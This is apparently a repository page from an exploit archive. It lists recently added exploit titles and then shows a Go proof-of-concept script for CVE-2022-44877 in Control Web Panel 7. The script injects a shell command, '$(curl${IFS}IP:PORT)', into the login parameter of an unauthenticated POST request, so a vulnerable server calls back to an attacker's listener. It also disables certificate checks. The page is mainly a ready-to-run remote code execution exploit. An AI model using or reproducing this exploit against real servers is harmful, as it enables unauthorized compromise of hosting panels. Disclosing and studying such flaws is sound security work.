
32 changes to exploits/shellcodes/ghdb Answerdev 1.0.3 - Account Takeover D-Link DIR-846 - Remote Command Execution (RCE) vulnerability Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure SOUND4 LinkAndShare Transmitter 1.1.2 - Format String Stack Buffer Overflow ERPNext 12.29 - Cross-Site Scripting (XSS) Liferay Portal 6.2.5 - Insecure Permissions GNU screen v4.9.0 - Privilege Escalation Apache Tomcat 10.1 - Denial Of Service PostgreSQL 9.6.1 - Remote Code Execution (RCE) (Authenticated) BTCPay Server v1.7.4 - HTML Injection. Provide Server v.14.4 XSS - CSRF & Remote Code Execution (RCE) Secure Web Gateway 10.2.11 - Cross-Site Scripting (XSS) ImageMagick 7.1.0-49 - DoS bgERP v22.31 (Orlovets) - Cookie Session vulnerability & Cross-Site Scripting (XSS) Bus Pass Management System 1.0 - Stored Cross-Site Scripting (XSS) Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS) CKEditor 5 35.4.0 - Cross-Site Scripting (XSS) Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE) Froxlor 2.0.3 Stable - Remote Code Execution (RCE) ImageMagick 7.1.0-49 - Arbitrary File Read itech TrainSmart r1044 - SQL injection Online Eyewear Shop 1.0 - SQL Injection (Unauthenticated) PhotoShow 3.0 - Remote Code Execution projectSend r1605 - Remote Code Exectution RCE Responsive FileManager 9.9.5 - Remote Code Execution (RCE) zstore 6.6.0 - Cross-Site Scripting (XSS) Binwalk v2.3.2 - Remote Command Execution (RCE) XWorm Trojan 2.1 - Null Pointer Derefernce DoS Kardex Mlog MCC 5.7.12 - RCE (Remote Code Execution) Linux/x86_64 - bash Shellcode with xor encoding
65 lines
No EOL
1.8 KiB
Go
Executable file
65 lines
No EOL
1.8 KiB
Go
Executable file
// Exploit Title: Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE)
|
|
// Date: 2023-02-02
|
|
// Exploit Author: Mayank Deshmukh
|
|
// Vendor Homepage: https://centos-webpanel.com/
|
|
// Affected Versions: version < 0.9.8.1147
|
|
// Tested on: Kali Linux
|
|
// CVE : CVE-2022-44877
|
|
// Github POC: https://github.com/ColdFusionX/CVE-2022-44877-CWP7
|
|
|
|
// Exploit Usage : go run exploit.go -u https://127.0.0.1:2030 -i 127.0.0.1:8020
|
|
|
|
package main
|
|
|
|
import (
|
|
"bytes"
|
|
"crypto/tls"
|
|
"fmt"
|
|
"net/http"
|
|
"flag"
|
|
"time"
|
|
)
|
|
|
|
func main() {
|
|
|
|
var host,call string
|
|
flag.StringVar(&host, "u", "", "Control Web Panel (CWP) URL (ex. https://127.0.0.1:2030)")
|
|
flag.StringVar(&call, "i", "", "Listener IP:PORT (ex. 127.0.0.1:8020)")
|
|
|
|
flag.Parse()
|
|
|
|
banner := `
|
|
-= Control Web Panel 7 (CWP7) Remote Code Execution (RCE) (CVE-2022-44877) =-
|
|
- by Mayank Deshmukh (ColdFusionX)
|
|
|
|
`
|
|
fmt.Printf(banner)
|
|
fmt.Println("[*] Triggering cURL command")
|
|
|
|
fmt.Println("[*] Open Listener on " + call + "")
|
|
|
|
//Skip certificate validation
|
|
tr := &http.Transport{
|
|
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
|
|
}
|
|
client := &http.Client{Transport: tr}
|
|
|
|
// Request URL
|
|
url := host + "/login/index.php?login=$(curl${IFS}" + call + ")"
|
|
|
|
// Request body
|
|
body := bytes.NewBuffer([]byte("username=root&password=cfx&commit=Login"))
|
|
|
|
// Create HTTP client and send POST request
|
|
req, err := http.NewRequest("POST", url, body)
|
|
req.Header.Add("Content-Type", "application/x-www-form-urlencoded")
|
|
resp, err := client.Do(req)
|
|
if err != nil {
|
|
fmt.Println("Error sending request:", err)
|
|
return
|
|
}
|
|
time.Sleep(2 * time.Second)
|
|
|
|
defer resp.Body.Close()
|
|
fmt.Println("\n[*] Check Listener for OOB callback")
|
|
} |